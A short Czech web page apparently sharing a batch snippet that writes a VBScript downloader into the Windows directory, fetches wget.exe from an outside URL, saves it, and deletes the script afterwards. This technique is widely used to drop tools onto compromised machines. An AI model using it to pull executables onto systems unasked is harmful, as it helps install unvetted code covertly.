VBS download script

30. 05. 2006 | † 30. 09. 2015 | kód autora: G9I
c:
cd %windir%
echo Dim DataBin >test.vbs
echo Dim HTTPGET >>test.vbs
echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP") >>test.vbs
echo HTTPGET.Open "GET", "http://members.chello.cz/wget.exe", False >>test.vbs
echo HTTPGET.Send >>test.vbs
echo DataBin = HTTPGET.ResponseBody >>test.vbs
echo Const adTypeBinary=1 >>test.vbs
echo Const adSaveCreateOverWrite=2 >>test.vbs
echo Dim test1 >>test.vbs
echo Set test1 = CreateObject("ADODB.Stream") >>test.vbs
echo test1.Type = adTypeBinary >>test.vbs
echo test1.Open >>test.vbs
echo test1.Write DataBin >>test.vbs
echo test1.SaveToFile "wget.exe", adSaveCreateOverWrite >>test.vbs
cscript test.vbs
del test.vbs
dir wget.exe

Zobrazit další články tohoto autora

Související články

Copyright © 2008-2018 Hups.cz. Všechna práva vyhrazena.